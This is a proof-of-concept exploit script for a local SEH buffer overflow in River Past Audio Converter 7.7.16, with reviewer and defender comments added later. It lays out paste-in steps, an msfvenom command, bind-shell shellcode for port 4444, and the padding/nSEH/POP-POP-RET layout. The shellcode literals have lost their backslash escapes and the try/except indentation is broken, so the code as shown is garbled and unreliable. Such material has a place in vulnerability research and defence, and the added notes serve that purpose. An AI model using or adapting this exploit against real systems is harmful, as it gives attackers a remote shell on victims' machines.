# Exploit Title: River_Past_Audio_Converter - Buffer Overflow (SEH)
# Date: 06.02.2019
# Vendor Homepage: www.riverpast.com
# Software Link: https://en.softonic.com/download/river-past-audio-converter/windows/post-download?sl=3D1
# Exploit Author: Matteo Malvica
# Tested Version: 7.7.16
# Tested on: Windows 10 - 10.0.17134.1
# Vulnerability Type: Local Buffer Overflow (SEH)
#
# Steps:
# 1.- Run python code : River_Past_Audio_Converter.py
# 2.- Open carbonara.txt and copy content to clipboard
# 3.- Open River_PastAudio_Converter.exe and click on 'Options' inside the 'File' menu.
# 4.- Paste the content of carbonara.txt into the 'Lame_enc.dll' name field.
# 5.- Click 'OK' and you will have a bind shell listening on port 4444.

import socket
import struct

# Payload text. Per the author's generator command on the next line, this is
# meant to be a Windows x86 TCP bind shell on port 4444, encoded to avoid the
# listed bad characters.
# NOTE(review): as extracted on this page the literals carry no backslash
# escapes, so they are plain text here; they are kept exactly as found.
# Defender note: the behaviour described in the header is a new TCP listener
# on port 4444 appearing after the 'Options' dialog is confirmed, presumably
# owned by the converter process. A desktop audio tool opening a listening
# socket is the observable to alert on in host firewall and process/network
# telemetry.
#msfvenom -p windows/shell_bind_tcp LPORT=4444 -a x86 -b 'x00x0dx0ax42' -f python
shellcode = ""
shellcode += "x31xc9x83xe9xaexe8xffxffxffxffxc0x5ex81"
shellcode += "x76x0exbaxfex4dxccx83xeexfcxe2xf4x46x16"
shellcode += "xcfxccxbaxfex2dx45x5fxcfx8dxa8x31xaex7d"
shellcode += "x47xe8xf2xc6x9exaex75x3fxe4xb5x49x07xea"
shellcode += "x8bx01xe1xf0xdbx82x4fxe0x9ax3fx82xc1xbb"
shellcode += "x39xafx3exe8xa9xc6x9exaax75x07xf0x31xb2"
shellcode += "x5cxb4x59xb6x4cx1dxebx75x14xecxbbx2dxc6"
shellcode += "x85xa2x1dx77x85x31xcaxc6xcdx6cxcfxb2x60"
shellcode += "x7bx31x40xcdx7dxc6xadxb9x4cxfdx30x34x81"
shellcode += "x83x69xb9x5exa6xc6x94x9exffx9exaax31xf2"
shellcode += "x06x47xe2xe2x4cx1fx31xfaxc6xcdx6ax77x09"
shellcode += "xe8x9exa5x16xadxe3xa4x1cx33x5axa1x12x96"
shellcode += "x31xecxa6x41xe7x96x7exfexbaxfex25xbbxc9"
shellcode += "xccx12x98xd2xb2x3axeaxbdx01x98x74x2axff"
shellcode += "x4dxccx93x3ax19x9cxd2xd7xcdxa7xbax01x98"
shellcode += "xa6xb2xa7x1dx2ex47xbex1dx8cxeax96xa7xc3"
shellcode += "x65x1exb2x19x2dx96x4fxccxabxa2xc4x2axd0"
shellcode += "xeex1bx9bxd2x3cx96xfbxddx01x98x9bxd2x49"
shellcode += "xa4xf4x45x01x98x9bxd2x8axa1xf7x5bx01x98"
shellcode += "x9bx2dx96x38xa2xf7x9fxb2x19xd2x9dx20xa8"
shellcode += "xbax77xaex9bxedxa9x7cx3axd0xecx14x9ax58"
shellcode += "x03x2bx0bxfexdax71xcdxbbx73x09xe8xaax38"
shellcode += "x4dx88xeexaex1bx9axecxb8x1bx82xecxa8x1e"
shellcode += "x9axd2x87x81xf3x3cx01x98x45x5axb0x1bx8a"
shellcode += "x45xcex25xc4x3dxe3x2dx33x6fx45xbdx79x18"
shellcode += "xa8x25x6ax2fx43xd0x33x6fxc2x4bxb0xb0x7e"
shellcode += "xb6x2cxcfxfbxf6x8bxa9x8cx22xa6xbaxadxb2"
shellcode += "x19"


# Layout of the oversized string that the header says is pasted into the
# 'Lame_enc.dll' name field. The header classifies the bug as a local
# SEH-based buffer overflow, so the field is presumably copied into a fixed
# stack buffer without a length check -- TODO confirm against the binary.
# NOTE(review): every len() below is taken over the literals as written on
# this page, so the resulting sizes may differ from the author's original.

# Filler character repeated 280 times, placed first in the string.
padding="x21"*280
# Value placed immediately before the handler address.
nseh = "xEBx12x90x90"
# Handler address, packed as a little-endian 32-bit value.
# Defender note: a hard-coded handler address implies a module loaded at a
# fixed base (presumably built without ASLR/SafeSEH -- not shown here).
seh = struct.pack('<L',0x10011977) # 10011977 # POP POP RET
# Trailing filler sized against a 3000-character target. The arithmetic
# subtracts only padding, shellcode and 4; seh and the NOP run are not counted.
rest = "x24" * (3000-len(padding)-len(shellcode)-4)
nops = "x90x90x90x90"

# Final string, in the order the pieces are concatenated.
# Defender note: the mitigations for this class of bug are SafeSEH/SEHOP
# validation of exception-handler records, DEP and ASLR on every module in
# the process, and bounding the length of the dialog field before it is copied.
payload = padding + nseh + seh + nops * 16 + shellcode + rest

# Writes the assembled string to carbonara.txt in the current working
# directory and prints its length. Uses Python 2 print statements.
# NOTE(review): the indentation of the try/except bodies was lost in
# extraction; the lines are kept exactly as found.
# NOTE(review): the bare except hides the real failure (for example a
# permissions or disk error) behind one generic message, and the file is
# not closed if write() raises.
try:
f=open("carbonara.txt","w")
print "[+] Creating %s bytes pasta payload.." %len(payload)
f.write(payload)
f.close()
print "[+] Carbonara created!"

except:
print "Carbonara cannot be created"